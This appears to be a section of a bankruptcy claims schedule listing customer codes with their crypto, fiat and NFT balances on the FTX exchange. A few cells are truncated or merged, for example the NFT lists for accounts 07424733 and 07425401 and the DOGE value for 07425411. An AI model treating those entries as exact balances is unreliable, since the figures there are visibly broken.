| 07424726 | | BRZ[1], CUSDT[2], DOGE[2657.07057867], USD[0.00] | Yes | |
| 07424730 | | BTC[.00137803], CUSDT[1], DOGE[325.74731359], ETH[.06991246], ETHW[.06904469], SHIB[5719026.21866163], TRX[1678.18976254], USD[0.81] | | |
| 07424732 | | CUSDT[4], DOGE[1], ETH[0], SUSHI[0], TRX[2.09436400], USD[0.00] | | |
| 07424733 | | BCH[8.55172681], BRZ[1], ETH[3.65523709], ETHW[3.65366854], MATIC[1308.28355524], NFT (304747259987040935/Tim Brown's Playbook: Michigan State vs. Notre Dame - September 19, 1987 #30)[1], NFT (308396469565019350/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #65)[1], NFT (308443932405307296/Tim Brown's Playbook: Kansas City Chiefs vs. Oakland Raiders - December 9, 2001 #18)[1], NFT (346844638651915976/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #63)[1], NFT (349955416826625854/Shannon Sharpe's Playbook: Denver Broncos vs. Los Angeles Raiders - January 9, 1994 #20)[1], NFT (358142067276495384/Hall of Fantasy League #5)[1], NFT (359833004588883546/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #62)[1], NFT (373855049057496676/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #61)[1], NFT (399402350401864821/Tim Brown's Playbook: San Diego Chargers vs. Los Angeles Raiders - September 4, 1988 #29)[1], NFT (405578433540784246/Tim Brown's Playbook: Kansas City Chiefs vs. Oakland Raiders - December 9, 2001 #20)[1], NFT (425550815869631652/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #49)[1], NFT (437095305950175859/Joe Theismann's Playbook: Notre Dame vs. USC - November 30, 1968 #32)[1], NFT (492783664808747230/Earl Campbell's Playbook: Rice vs. Texas - October 1st, 1977 #53)[1], NFT (500946484125588574/Tim Brown's Playbook: Michigan State vs. Notre Dame - September 19, 1987 #39)[1], NFT (509767345449399435/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #66)[1], NFT (542080551309762075/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #49)[1], NFT (544885708524538274/Shannon Sharpe's Playbook: Baltimore Ravens vs. Oakland Raiders - January 14, 2001 #36)[1], NFT (551151803260350117/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #52)[1], NFT (557748517043859735/Marcus Allen's Playbook: Seattle Seahawks vs. Los Angeles Raiders - October 7, 1984 #50)[1], NFT (568324128959944917/Marcus Allen's Playbook: Los Angeles Raiders vs. Washington - January 22, 1984 #45)[1], NFT (571881276233531518/Marcus Allen's Playbook: Los Angeles Raiders vs. Washington - January 22, 1984 #15], SHIB[3], SOL[12.71228913], SUSHI[522.48679836], TRX[1], USD[16.33], USDT[2.48206845] | Yes | |
| 07424735 | | CUSDT[1], USD[0.00] | | |
| 07424741 | | SOL[.00000001], USD[0.00] | | |
| 07424745 | | CUSDT[2], GRT[1], TRX[1], USD[0.00], USDT[0.00000001] | | |
| 07424747 | | BTC[0.00000001], ETH[0], SHIB[2], SOL[0], USD[242.39], USDT[0.00000001] | Yes | |
| 07424750 | | BTC[0], CUSDT[10], SHIB[3], TRX[2], USD[0.01] | Yes | |
| 07424751 | | BAT[3.08025012], BRZ[7.30473949], CUSDT[7], GRT[5.00437685], LINK[.59377188], SHIB[4732774.00687186], TRX[12], USD[0.00], USDT[3.14340607] | Yes | |
| 07424756 | | USD[0.00] | | |
| 07424758 | | BAT[1], CUSDT[1], USD[0.00] | | |
| 07424764 | | SOL[.00018247] | Yes | |
| 07424774 | | CUSDT[1], TRX[0], USD[0.00] | | |
| 07424775 | | USDT[0.00076802] | | |
| 07424776 | | CUSDT[2616.37998672], DOGE[9622.21711428], LINK[3.64394332], SHIB[2188115.73330521], TRX[1578.46941786], USD[0.00] | Yes | |
| 07424777 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07424780 | | USD[150.00] | | |
| 07424786 | | DOGE[1], USD[0.00] | | |
| 07424787 | | ETHW[2.53605563], MATIC[.40346172], SOL[.00025853], USD[0.00] | Yes | |
| 07424793 | | CUSDT[1], USD[0.00] | Yes | |
| 07424794 | | BTC[.00173174] | | |
| 07424804 | | USD[3.32] | | |
| 07424816 | | BTC[0.05775987], ETH[.10536106], ETHW[999.8794348], SOL[56.75], USD[25.57], USDT[3.18026504] | | |
| 07424827 | | BAT[0], BTC[0], USD[0], USDT[784.71349138] | | |
| 07424828 | | DOGE[1166.07850901], ETH[.0000694], ETHW[.0000694], USD[0.04] | Yes | |
| 07424829 | | USD[0.19] | | |
| 07424830 | | BAT[2], BRZ[7.41374035], CUSDT[8], DOGE[11.47265699], GRT[14.13817412], SHIB[1], SOL[0], SUSHI[1.04432364], TRX[11.05258085], USD[0.00], USDT[3.20274448] | Yes | |
| 07424832 | | BCH[0], BTC[0], DOGE[0], ETH[0], KSHIB[0], LINK[0], SHIB[0], USD[0.00] | | |
| 07424834 | | CUSDT[1], USD[0.00] | | |
| 07424838 | | DOGE[1], USD[0.00] | | |
| 07424843 | | BAT[1.00599044], DOGE[2], SOL[.00004566], USD[0.00] | Yes | |
| 07424845 | | BTC[0], USD[0.00] | | |
| 07424849 | | SOL[37.70859050], USD[0.70] | | |
| 07424850 | | BRZ[1], CUSDT[1], ETH[0], TRX[2], USD[0.00] | | |
| 07424851 | | BTC[.00025947], CUSDT[84.00412725], DOGE[20.77713523], ETH[.00567235], ETHW[.00560395], GRT[2.05894383], LINK[.06913298], LTC[.02171989], MATIC[6.14132353], SOL[.09388119], SUSHI[.20783037], TRX[38.41789443], UNI[.09314844], USD[0.41], USDT[.99428125] | Yes | |
| 07424854 | | BCH[4.99142743], BTC[0], LINK[35.9], MATIC[170], SOL[10.0084515], SUSHI[515.485275], USD[0.28], USDT[0] | | |
| 07424859 | | BTC[.0007238], DOGE[1088.25788704], ETH[0.13174996], ETHW[0.13174996], SOL[27.90664568] | | |
| 07424863 | | BRZ[1], CUSDT[2], DOGE[1869.75992295], ETH[.30261949], ETHW[.30242905], LINK[3.32385961], TRX[3], USD[3.56] | | |
| 07424868 | | ETH[.00000075], ETHW[0.00000075] | Yes | |
| 07424872 | | BF_POINT[200], NFT (383458701144180983/Entrance Voucher #4271)[1], NFT (523507894464294654/Humpty Dumpty #455)[1], USD[0.00], USDT[0] | | |
| 07424873 | | SOL[33.75136948], USD[0.00] | | |
| 07424875 | | BTC[.00068872], CUSDT[3], DOGE[299.01303438], ETH[.01423023], ETHW[.01423023], PAXG[.01065858], TRX[414.23674698], USD[0.00] | | |
| 07424881 | | BTC[.00033258], SOL[0], USD[20.63] | | |
| 07424882 | | BTC[0], USD[668.90], USDT[0] | | |
| 07424885 | | BAT[1], DOGE[0], USD[0.01], USDT[0] | | |
| 07424889 | | USDT[0] | | |
| 07424895 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07424896 | | SOL[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07424902 | | BTC[.00000547], SOL[0], USDT[2.956] | | |
| 07424907 | | SOL[0] | | |
| 07424908 | | BTC[0], SOL[0], USD[0.00], USDT[0] | | |
| 07424909 | | USD[5.00] | | |
| 07424912 | | TRX[40562.90554474], USDT[0] | | |
| 07424919 | | SOL[.18250782], USD[7.50] | | |
| 07424920 | | USD[0.12] | | |
| 07424928 | | DOGE[.9399182], USD[0.00] | Yes | |
| 07424937 | | BTC[.2763234], ETH[0], ETHW[0.00066048], USD[42.95] | | |
| 07424941 | | ETH[0.00000001], LINK[0], NFT (347958359680541668/SOLSetting)[1], SOL[0.98000000], TRX[0], USD[8818.64] | | |
| 07424943 | | CUSDT[523.48735107], DOGE[2900.42023751], SHIB[292.56423794], TRX[87.00277233], USD[0.00] | Yes | |
| 07424949 | | USD[2.00] | | |
| 07424951 | | BAT[0], BCH[0], CUSDT[0], DAI[0], DOGE[0], ETH[0], GRT[0], LINK[0], MATIC[0], SGD[0.00], TRX[0], USD[0.01], USDT[0.00000264] | Yes | |
| 07424953 | | BRZ[2], CUSDT[17], DOGE[4.02268932], LINK[.00000928], TRX[13.17570427], USD[0.01] | Yes | |
| 07424955 | | AVAX[3.60219522], BAT[6.38541955], BRZ[3], BTC[.00001027], CUSDT[2], DOGE[4], GRT[7.28028765], LINK[1.06479599], MATIC[1.85513281], SUSHI[2.06633715], UNI[2.12379124], USD[436.84], USDT[10.56621467] | Yes | |
| 07424961 | | NFT (52384386092624530/Coachella x FTX Weekend 2 #18696)[1] | | |
| 07424965 | | TRX[.000002], USDT[0] | | |
| 07424970 | | BRZ[1], CUSDT[3], SOL[.00000011], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07424976 | | BTC[.0052947], USD[80.52], USDT[0.00000001] | | |
| 07424977 | | BTC[.1094904], SOL[9.18373], USD[11.97] | | |
| 07424978 | | USD[0.01] | | |
| 07424982 | | ETH[.00000001], SOL[0.00000002], USD[58.41] | | |
| 07424986 | | DOGE[2], ETH[.2234791], ETHW[.22326898], SOL[3.92091501], TRX[4], USD[0.90], USDT[1.10774702] | Yes | |
| 07424988 | | DOGE[337.28305559], USD[0.00] | | |
| 07424992 | | BRZ[.5], CUSDT[1], DOGE[656.20092325], USD[0.69], USDT[0.99498630] | Yes | |
| 07425002 | | BAT[1], DOGE[1], TRX[2], USD[0.00] | | |
| 07425021 | | BTC[0], DOGE[1], SOL[20.29566704], TRX[1], USD[11.39], USDT[0.00000045] | Yes | |
| 07425022 | | USD[0.15] | | |
| 07425025 | | ETH[.501], ETHW[.501], SOL[64.74], USD[7.31] | | |
| 07425032 | | BRZ[1], DOGE[1], TRX[2], USD[0.01] | | |
| 07425036 | | USD[0.00], USDT[0] | | |
| 07425050 | | LINK[15.99624827] | | |
| 07425058 | Contingent, Disputed | USD[0.00], USDT[0] | | |
| 07425066 | | BRZ[108.18531024], CUSDT[2], DOGE[3457.78276671], GRT[143.18637333], SUSHI[.49079531], TRX[12587.67874077], USD[68.44] | | |
| 07425071 | | LINK[22.47221078], SHIB[1], USD[0.00] | Yes | |
| 07425075 | | CUSDT[1], DOGE[66740.62907108], GRT[3], USD[0.00], USDT[1] | Yes | |
| 07425081 | | USD[1.99] | | |
| 07425088 | | BRZ[3], BTC[0.00282975], DOGE[1], ETH[0.00000034], ETHW[0.00000034], LINK[0], SHIB[28], SOL[0], TRX[11], USD[0.00] | Yes | |
| 07425090 | | BTC[.00789958], DOGE[2], USD[0.00], USDT[0] | Yes | |
| 07425093 | | BTC[0.00003285], USD[0.00] | | |
| 07425094 | | BRZ[2], CUSDT[1], SHIB[295247.14463204], TRX[4], USD[0.00] | Yes | |
| 07425095 | | DOGE[1721.18180945], USD[0.00] | | |
| 07425098 | | BAT[1], BRZ[5], DOGE[8.007748], SHIB[3], TRX[7], USD[0.00] | Yes | |
| 07425104 | | AAVE[5.50648511], BTC[0], ETH[0], LINK[10.71884903], MKR[0.00767350], SOL[23.38909775], USD[0.00] | | AAVE[2.3014557], LINK[10.562319], MKR[.007344], SOL[22.96193] |
| 07425105 | | BAT[0.00000974], CUSDT[4], DOGE[3], LINK[0], USD[0.00] | | |
| 07425110 | | BF_POINT[200], CUSDT[4], DOGE[3], GRT[1.00367791], TRX[2], USD[0.00] | Yes | |
| 07425113 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07425114 | | GRT[0], TRX[0], USD[0.01], USDT[0] | Yes | |
| 07425119 | | BAT[2], BRZ[6.51595072], SOL[.10902688], TRX[2], USD[7.25], USDT[1] | | |
| 07425124 | | DOGE[0], ETH[0], USD[0.01] | | |
| 07425125 | | CUSDT[9], DOGE[560.59502604], ETH[.0962264], ETHW[.0951864], MATIC[171.03359854], SHIB[1], TRX[1], USD[87.86] | Yes | |
| 07425127 | | USD[0.01] | | |
| 07425129 | | BTC[0], ETH[0.00036154], ETHW[0.00036154], LINK[0], LTC[0], SOL[0], USD[3.85], USDT[0.00000001] | | |
| 07425130 | | BRZ[1], CUSDT[2], USD[0.00] | | |
| 07425131 | | DOGE[2138.91276824], SHIB[1], TRX[3424.592764], USD[0.00] | | |
| 07425138 | | DOGE[.26024307], TRX[1], USD[0.80], USDT[0] | Yes | |
| 07425139 | | DOGE[1], USD[0.00] | | |
| 07425141 | | DOGE[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07425142 | | BAT[1], BRZ[3], DOGE[3], SHIB[2], TRX[5], USD[899.14], USDT[1] | | |
| 07425144 | | BTC[0], LINK[0], LTC[0], SHIB[2], SOL[0.00003527], USD[0.00] | Yes | |
| 07425158 | | BTC[0], DOGE[.97869561], SOL[0], USD[0.00] | | |
| 07425164 | | LTC[0.00077437], USD[0.00] | | |
| 07425167 | | BTC[0], DOGE[79.08967922], ETH[0], ETHW[0] | Yes | |
| 07425168 | | BRZ[1], BTC[.02304438], CUSDT[38], DOGE[6], ETH[.27474372], ETHW[.27474372], SHIB[2], TRX[7], USD[0.01] | | |
| 07425170 | | BTC[.0001647], CUSDT[2], DOGE[262.19778151], ETH[.0015212], ETHW[.0015212], USD[0.14] | | |
| 07425174 | | BTC[.00035836], DOGE[1], USD[0.00] | | |
| 07425176 | | BTC[0], CUSDT[1], DOGE[0] | | |
| 07425178 | | DOGE[1], USD[0.00] | | |
| 07425181 | | BTC[0], DOGE[0], TRX[1], USD[0.00] | | |
| 07425184 | | BAT[1.01647943], BRZ[5.07952967], CUSDT[12], DOGE[13313.34817736], ETH[.62642027], ETHW[.62615715], GRT[2.08187092], SHIB[2158092.53256696], SOL[31.24183955], TRX[3], USD[0.00], USDT[2.21658983] | Yes | |
| 07425189 | | BTC[0.00684493], CUSDT[6], ETH[.02828574], ETHW[.0279298], SOL[1.85336082], USD[0.00] | Yes | |
| 07425193 | | BAT[37.03047715], CUSDT[2], DOGE[1], TRX[1685.52418583], USD[0.00] | | |
| 07425194 | | TRX[.831], USD[31.05] | | |
| 07425195 | | USD[0.00] | Yes | |
| 07425196 | | BAT[1], DOGE[1], USD[0.01] | | |
| 07425197 | | BRZ[6.66295189], BTC[0], CUSDT[16], DOGE[2139.02748850], ETH[0], GRT[1.00498957], LTC[0], PAXG[0.11400191], SHIB[1], TRX[1148.38920239], USD[0.00], USDT[0] | Yes | |
| 07425199 | | USD[0.00] | | |
| 07425200 | | USD[0.01], USDT[0] | Yes | |
| 07425204 | | BAT[0], DOGE[2.71505749], ETH[0], USD[0.00] | | |
| 07425205 | | BAT[1.0165555], BRZ[2], CUSDT[1], DOGE[2], TRX[7769.71472107], USD[0.00] | Yes | |
| 07425214 | | CUSDT[1], DOGE[3.00027095], SHIB[2], TRX[713.49551538], USD[0.00] | Yes | |
| 07425217 | | USD[0.17] | | |
| 07425219 | | BTC[.00972991], CUSDT[1], DOGE[1], USD[0.00] | | |
| 07425220 | | BAT[1.01655549], BRZ[1], CUSDT[6], DOGE[498.28149109], GRT[1028.91133623], SOL[2.64892216], TRX[12929.91958626], USD[0.00] | Yes | |
| 07425222 | | USD[0.01], USDT[1.7982] | | |
| 07425223 | | BAT[1], CUSDT[5], DOGE[.00004857], TRX[1], USD[0.06] | | |
| 07425230 | | CUSDT[0], DOGE[0], TRX[1], USD[0.00], USDT[0] | | |
| 07425232 | | BRZ[1], BTC[0], CUSDT[4], SOL[.04528505], USD[1.50] | | |
| 07425233 | | CUSDT[1], USD[0.01] | | |
| 07425236 | | BTC[.00044744], DOGE[1], USD[0.00] | | |
| 07425237 | | DOGE[1], USD[0.00] | Yes | |
| 07425238 | | SHIB[1], USD[0.00] | Yes | |
| 07425239 | | BTC[0], DOGE[0], LTC[0], USD[0.00] | | |
| 07425241 | | CAD[0.00], ETH[0.70948130], ETHW[0.70917674], MATIC[0], SHIB[0], USD[0.00], USDT[0.00000420] | Yes | |
| 07425242 | Contingent, Disputed | LINK[.03317633], SOL[3.097], USD[1.39] | | |
| 07425243 | | CUSDT[1], DOGE[1], TRX[4], USD[771.79] | | |
| 07425253 | | BAT[1], BRZ[1], BTC[0], CUSDT[1], DOGE[0], GRT[2], TRX[5], USD[0.00], USDT[1] | | |
| 07425254 | | BAT[1.0165555], BRZ[4], CUSDT[19], DOGE[1223.4733853], ETH[.00000528], ETHW[.57809829], NFT [453834853583852309/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #127][1], NFT [460868011190238414/Entrance Voucher #3875][1], NFT [535192537880516728/Shannon Sharpe's Playbook: Denver Broncos vs. Los Angeles Raiders - January 9, 1994 #76][1], SHIB[19], SOL[.0000167], TRX[2], USD[0.00], USDT[2.14412787] | Yes | |
| 07425255 | | NFT [307636488250822645/Bahrain Ticket Stub #2170][1], NFT [518155669630805240/FTX - Off The Grid Miami #4849][1] | Yes | |
| 07425257 | | TRX[1], USD[0.00] | | |
| 07425258 | | CUSDT[1], DOGE[826.37484334], SHIB[2], TRX[3], USD[0.00] | Yes | |
| 07425265 | | BAT[1], CUSDT[5], DOGE[73.72883914], ETH[0], LTC[0], TRX[4], USD[0.00] | | |
| 07425273 | | BAT[77.11125494], BRZ[1], CUSDT[2], DOGE[3], ETH[.00001494], ETHW[.00001494], GRT[4.13738136], SHIB[1], SOL[.00005353], TRX[87.7723958], USD[0.00], USDT[1.02200096] | Yes | |
| 07425280 | | BTC[0], USD[0.00] | | |
| 07425281 | | BTC[.000035], MATIC[528.57436864], USD[0.00] | | |
| 07425285 | | USD[0.00] | | |
| 07425292 | | DOGE[1], SHIB[3], USD[0.00] | | |
| 07425294 | | AAVE[1.09252624], ALGO[1811.87490112], BCH[1.10366772], BRZ[4], BTC[.23846882], CUSDT[12], DOGE[969.49272649], GRT[1], NFT [474553935549366112/Entrance Voucher #2894][1], SHIB[1653261.31908558], TRX[8], USD[-396.40] | | |
| 07425295 | | DOGE[.6943848], USD[0.00] | | |
| 07425296 | | ETH[.00000001], USD[0.76], USDT[0.00000001] | | |
| 07425297 | | BRZ[1], BTC[.00046871], CUSDT[15], DOGE[2350.03135557], ETH[0.05346586], ETHW[0.05280191], LINK[3.36732491], SOL[2.22900569], TRX[1203.72531199], USD[0.00] | Yes | |
| 07425303 | | CUSDT[1], ETH[.00000001], TRX[1], USD[0.00] | | |
| 07425308 | | AVAX[0], BAT[0], BRZ[0], CUSDT[0], DOGE[0], ETH[0], GRT[0], KSHIB[0], LINK[0.00000911], LTC[0], MATIC[0], PAXG[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07425311 | | DOGE[278.76467784], USD[0.00] | Yes | |
| 07425318 | | BTC[0.00001764] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07425319 | | BAT[172.08215978], BCH[1.00486345], BRZ[555.33440268], CUSDT[6], DAI[99.10398305], DOGE[6359.03263692], ETH[9.62968126], ETHW[9.62968126], GRT[60.86438579], KSHIB[1815.03026562], LINK[93.87136914], LTC[2.10325005], PAXG[.10994939], SHIB[1], SOL[2.3654385], SUSHI[14.23471251], TRX[1879.28949485], UNI[4.95429661], USD[23987.26], USDT[4.00000002] | | |
| 07425321 | | TRX[2], USD[0.00] | | |
| 07425326 | | NFT (535137966953322933/Saudi Arabia Ticket Stub #1285)[1], USD[0.00] | | |
| 07425328 | | BAT[8.44210525], NFT (360435552529924584/Miami Ticket Stub #41)[1], TRX[200.42173707], UNI[.29933261], USD[0.00] | | |
| 07425330 | | TRX[461], USD[0.03] | | |
| 07425340 | | BRZ[1], CUSDT[2], SHIB[1], USD[0.00] | Yes | |
| 07425342 | | BAT[1], BRZ[3], BTC[.00588635], CUSDT[4], GRT[1008.92873183], SHIB[53229218.35025852], TRX[2], USD[0.00], USDT[3] | | |
| 07425343 | | BRZ[1], CUSDT[5], DOGE[2598.05662631], MATIC[0], SHIB[418804.83878007], SUSHI[0], TRX[2], USD[0.01] | Yes | |
| 07425347 | | BTC[.00000003], CUSDT[1], DOGE[0], ETHW[9.20481867], USD[0.00], USDT[1.02543197] | Yes | |
| 07425348 | | SOL[90.0673], USD[0.08] | | |
| 07425349 | | DOGE[2114.10153703], ETH[.35367775], ETHW[.35367775], TRX[2], USD[0.00] | | |
| 07425350 | | ETHW[.157], SHIB[1], TRX[1], USD[0.01] | | |
| 07425353 | | BRZ[76.69880005], DAI[27.36437887], DOGE[3.0003562], NFT (551038320120697331/Entrance Voucher #2849)[1], TRX[251.25552084], USD[0.00] | Yes | |
| 07425354 | | CUSDT[2], DOGE[1520.74874446], USD[0.00] | Yes | |
| 07425355 | | BTC[.00041312], SOL[53.764] | | |
| 07425358 | | DOGE[2], TRX[.00000288], USD[0.00] | | |
| 07425368 | | CUSDT[2], SHIB[2609605.34029227], USD[337.96] | | |
| 07425374 | | BRZ[1], CUSDT[1], DOGE[1], GRT[1], TRX[1], USD[0.00], USDT[3] | | |
| 07425379 | | BAT[3], ETHW[1.19289849], SHIB[3], TRX[5], USD[406.81], USDT[0.00000001] | | |
| 07425380 | | USD[0.00] | | |
| 07425382 | | DOGE[437.59442558], TRX[1], USD[0.00] | | |
| 07425384 | | SOL[0] | | |
| 07425386 | | USD[0.25] | | |
| 07425390 | | DOGE[2990.79927302], USD[0.01] | | |
| 07425400 | | BTC[0], USD[0.01], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07425401 | | ALGO[0], AVAX[0.00008945], BAT[0], BCH[0], BRZ[2], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], MATIC[0.00029737], NFT (288268628366400098/Doak Walker's Playbook: Detroit Lions vs. Cleveland Browns - December 28, 1952 #4)[1], NFT (289231455063069850/Ravager #793)[1], NFT (291616965548180267/Red Panda #6609)[1], NFT (291899138451347377/Belugie #3879)[1], NFT (292703904394100159/Optimistic Spence)[1], NFT (293469530527281845/SOLYETIS #7033)[1], NFT (294012466035887533/#309)[1], NFT (294218088992770858/The Suites Upgrade Key)[1], NFT (294848478737260214/APEFUEL by Almond Breeze #331)[1], NFT (295456231521230654/Ex Populus Trading Card Game)[1], NFT (295656869444237418/Scoop #6507)[1], NFT (295829295936252538/MagicEden Vaults)[1], NFT (296831665569677593/Cadet 208)[1], NFT (296861205604180017/Solana Islands #60)[1], NFT (295971522593192517/Solninjas #8585)[1], NFT (296208740708502794/LightPunk #260)[1], NFT (296476655526846540/Kiddo #608)[1], NFT (296537900284791130/DOGO-IN-500 #2328)[1], NFT (297384715018632993/Rox #281)[1], NFT (298117885793527635/Club Suite #3559)[1], NFT (298712922608768403/The Tower #9-13)[1], NFT (300040945434037843/Metahoses #3693)[1], NFT (300893768474538583/Space Bums #1953)[1], NFT (301846332306663527/DOTB #903)[1], NFT (302033891365447263/3D CATPUNK #3474)[1], NFT (302957828965551395/Settler #3131)[1], NFT (303493985596588759/#928)[1], NFT (303893569704479216/Naked Meerkat #4913)[1], NFT (305163772588866291/The Hellions #754)[1], NFT (306920690685901148/956)[1], NFT (307280197701370094/Mech #34)[1], NFT (307315324916001273/Careless Cat #721)[1], NFT (307954911211370918/SOLYETIS #4935)[1], NFT (308548833739610119/ApexDucks #598)[1], NFT (309741673612910668/Rox #164)[1], NFT (310072053403664581/Space Bums #6617)[1], NFT (312496976704421968/Baddies #3764)[1], NFT (312523179321064944/SOLYETIS #1819)[1], NFT (313821552857033959/Eitbit Ape #247)[1], NFT (313914896653325399/Common Cryptogram)[1], NFT (314754833895568840/Animal Gang #17)[1], NFT (314905932269674336/Fancy Frenchies #7448)[1], NFT (315279511661830263/Space Bums #1921)[1], NFT (315317725326373762/1419)[1], NFT (316279364990160805/Fancy Frenchies #6715)[1], NFT (316764990345664415/GOONEY #4292)[1], NFT (317084720954869025/First Verse #411)[1], NFT (317847900526658841/LightPunk #64)[1], NFT (318764778394078567/Doge Capital #320)[1], NFT (320090775820770259/Shannon Sharpe's Playbook: Kansas City Chiefs vs Denver Broncos - October 4, 1992 #11)[1], NFT (322200498332922476/Solana Islands #183)[1], NFT (322421815063337977/Zen Nadar)[1], NFT (322631353303273025/JungleCats #3388)[1], NFT (323221684113941009/Scoop #833)[1], NFT (323740242417101260/Coog #1493)[1], NFT (328999511299908270/Lunarian #7217)[1], NFT (324603258153403797/Monk #8258)[1], NFT (325890303175740216/The Tower #415-17)[1], NFT (328924754854565962/Pirate #1098)[1], NFT (329960155110897933/Solsteads Game Pass)[1], NFT (327182912088036426/#1357)[1], NFT (327528974150193153/Boneworld #7748)[1], NFT (327774761375522389/Shannon Sharpe's Playbook: Baltimore Ravens vs. Oakland Raiders - January 14, 2001 #72)[1], NFT (329320687418025825/FTX AU - we are here! #54094)[1], NFT (330067642855036964/Settler #1948)[1], NFT (330774363935795570/Roamer #73)[1], NFT (330781925228251/Trout #1)[1], NFT (331156807215387799/Eitbit Ape #494)[1], NFT (331574579628910757/Settler #2864)[1], NFT (332914142284304659/The Suites Upgrade Key)[1], NFT (332987834025151534/Mech #1358)[1], NFT (333341486228529/Solninjas #8041)[1], NFT (334111630050620884/ApexDucks #770)[1], NFT (334160200306217448/Baddies #4017)[1], NFT (335439012437675011/#41)[1], NFT (336545370430230292/Rat Bastard #5098)[1], NFT (336854227944452788/Monk #62)[1], NFT (337140878546918/Monkey League Cup)[1], NFT (338542720482831037/Degenerate Trash Can)[1], NFT (339243868492532/Solbucks Brew Club #4963)[1], NFT (340106862928177506/Coog #6194)[1], NFT (340223920330103095/Baddies #18)[1], NFT (341626466205118211/Space Bums #6892)[1], NFT (342335342474037395/Fancy Frenchies #1758)[1], NFT (344094707575399136/Boneworld #8419)[1], NFT (344320488806487889/LightPunk #1178)[1], NFT (344897780283727736/Belugie #4802)[1], NFT (345145224519515918/Settler #286)[1], NFT (346575909133461461/PixelPuffins #1020)[1], NFT (346855404573923289/Belugie #7287)[1], NFT (347413356330519914/Tim Brown's Playbook: Kansas City Chiefs vs. Oakland Raiders - December 9, 2001 #12)[1], NFT (347910487902024024/BabyBloo #29)[1], NFT (347974259600561169/Ex Populus Trading Card Game)[1], NFT (349971856857014471/Gangster Gorillas #2596)[1], NFT (350472554506831215/Monk #3602)[1], NFT (350370857849138254/Rogue Circuits #353)[1], NFT (350955164196667883/3D SOLDIER #833)[1], NFT (351185548074194971/Coog #1490)[1], NFT (351717530626098712/Doge Capital #1930)[1], NFT (352870292917281920/Coog #3504)[1], NFT (353825899561254444/Cyber Pharmacist #393)[1], NFT (354625819676124583/PixelPuffins #127)[1], NFT (355591030826586888/Doge Capital #1693)[1], NFT (356185620950298065/SolDoge Strays #1089)[1], NFT (357267810243329650/Cyber Samurai #3831)[1], NFT (359424534923224929/Boneworld #486)[1], NFT (360579294770265474/SolDad #5536)[1], NFT (360642249030192306/Degen Trash Panda #329)[1], NFT (361479200823721175/Coog #4899)[1], NFT (361490671422264602/Sol Lion #1620)[1], NFT (361720455505156760/Gangster Gorillas #3593)[1], NFT (362594052397274001/Cyber Technician 3374)[1], NFT (363612088808914509/DarkPunk #2723)[1], NFT (364812806714053330/Cyber Samurai #2890)[1], NFT (364879843636617049/Sigma Shark #507)[1], NFT (366166365829290419/Cyber Pharmacist 6034)[1], NFT (366322421529529169/Solbucks Brew Club #4624)[1], NFT (366898929602488150/Cyber Technician 1931)[1], NFT (367291589460476161/Settler #985)[1], NFT (367966852359935424/Scoop #629)[1], NFT (368186352690419872/Naked Meerkat #4536)[1], NFT (368237833021862013/Animal Gang #138)[1], NFT (368849972883391991/Upbeat Lalande)[1], NFT (369348997212961814/#998 Inverse Bear)[1], NFT (369435766690699930/Solana Islands #563)[1], NFT (394417282286219921/Astral Apes #1193)[1], NFT (396878196543823122/Animal Gang #63)[1], NFT (398024044379211965/RED VADER PONCHO #1)[1], NFT (399708841598801763/Monk #5060)[1], NFT (399734080453629322/Rogue Circuits #600)[1], NFT (400884079336226612/Metabases #6111)[1], NFT (400995823037973359/Animal Gang #302)[1], NFT (406628613421079485/Ex Populus Trading Card Game)[1], NFT (407159074333896351/Solana Islands #501)[1], NFT (408222129931812204/Coog) #6957)[1], NFT (408227376806820071/Doge Capital #42)[1], NFT (408500056128202579/Monkey League Cup)[1], NFT (408734078210193/#86)[1], NFT (409085964568143602/SOLYETIS #5865)[1], NFT (409725155734334484/Citizen 1#1139)[1], NFT (410641437425447574/Marcus Allen's Playbook: Kansas City Chiefs vs. Detriot Lions - November 29, 1996 #35)[1], NFT (414589185929748307/ApexDucks #1325)[1], NFT (415516460269736582/Boneworld #4750)[1], NFT (415891630572981401/Settler #283)[1], NFT (416017522612399190/Solninjas #3052)[1], NFT (418048467236232253/Bull #142)[1], NFT (419455665281410757/Mech #6270)[1], NFT | Yes | |
| 07425402 | | BRZ[2], CUSDT[18], GRT[1], SHIB[2989089.82214915], SOL[43.091209], TRX[0], USD[0.00], USDT[2] | | |
| 07425409 | | BTC[.03714194], CUSDT[4], DOGE[824.25961006], ETH[.78294249], ETHW[.78261359], LINK[16.83312587], USD[1157.24] | Yes | |
| 07425410 | | CUSDT[1], DOGE[2], SOL[.80137711], USD[0.00] | | |
| 07425411 | | BRZ[2], CUSDT[10], DOGE[4.02064868.05, ETHW[0], LINK[28.93338485], NFT (344943773612134304/Saudi Arabia Ticket Stub #2247)[1], TRX[2], USD[0.00] | | |
| 07425424 | | USD[0.00] | | |
